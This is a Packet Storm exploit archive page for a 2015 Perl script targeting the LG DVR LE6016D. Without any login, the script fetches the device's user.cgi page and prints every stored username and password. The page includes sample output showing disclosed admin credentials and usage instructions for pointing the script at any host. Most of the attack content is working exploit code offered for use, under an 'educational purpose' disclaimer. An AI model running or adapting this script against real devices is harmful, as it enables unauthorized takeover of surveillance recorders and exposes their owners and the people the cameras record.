exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LG DVR LE6016D Credential Disclosure

LG DVR LE6016D Credential Disclosure
Posted Feb 8, 2015
Authored by Todor Donev

LG DVR LE6016D unauthenticated remote user/password disclosure exploit.

tags | exploit, remote, info disclosure
SHA-256 | 78215c344bc67ecd36fd93e2a2a8dabff0e7aeadc8ca7856997f62aae484d853

LG DVR LE6016D Credential Disclosure

Change Mirror Download
#!/usr/bin/perl
#
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
#
#
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
####
#
# Digital video recorder (DVR) surveillance is the use of cameras,
# often hidden or concealed, that use DVR technology to record
# video for playback or immediate viewing. As technological
# innovations have made improvements in the security and
# surveillance industry, DVR surveillance has become more
# prominent and allows for easier and more versatile security
# systems in homes and businesses. A DVR surveillance security
# system can be designed for indoor use or outdoor use and can
# often involve hidden security cameras, concealed “nanny cams”
# for home security, and even personal recording devices hidden
# on a person.
#
####
#
# Description:
# No authentication (login) is required to exploit this vulnerability.
# This program demonstrates how unpatched security bug would enable
# hackers to gain control of a vulnerable device while sitting
# behind their keyboard, potentially thousands of miles away.
# An unauthenticated attacker that is connected to the DVR's may be
# able to retrieve the device's administrator password allowing them
# to directly access the device's configuration control panel.
#
####
#
# Disclaimer:
# This or previous programs is for Educational purpose ONLY. Do not
# use it without permission.The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
####
# Use them at your own risk!
####
#
# $ perl lg.pl 133.7.133.7:80
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
# u/p: admin/000000
# u/p: user1/000000
# u/p: user2/000000
# u/p: user3/000000
# u/p: LOGOUT/000000
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
####

use LWP::Simple;
print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
if (@ARGV == 0) {&usg; &foot;}
while (@ARGV > 0) {
$t = shift(@ARGV);
}
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
for (my $i=0; $i <= 4; $i++){
if ($r =~ m/<name>(.*)<\/name>/g){
print " u\/p: $1\/";
}
if ($r =~ m/<pw>(.*)<\/pw>/g){
print "$1\n";
}
}
&foot;
sub usg(){
print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
sub foot(){
print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
print " http://www.ethical-hacker.org/\n";
exit;
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close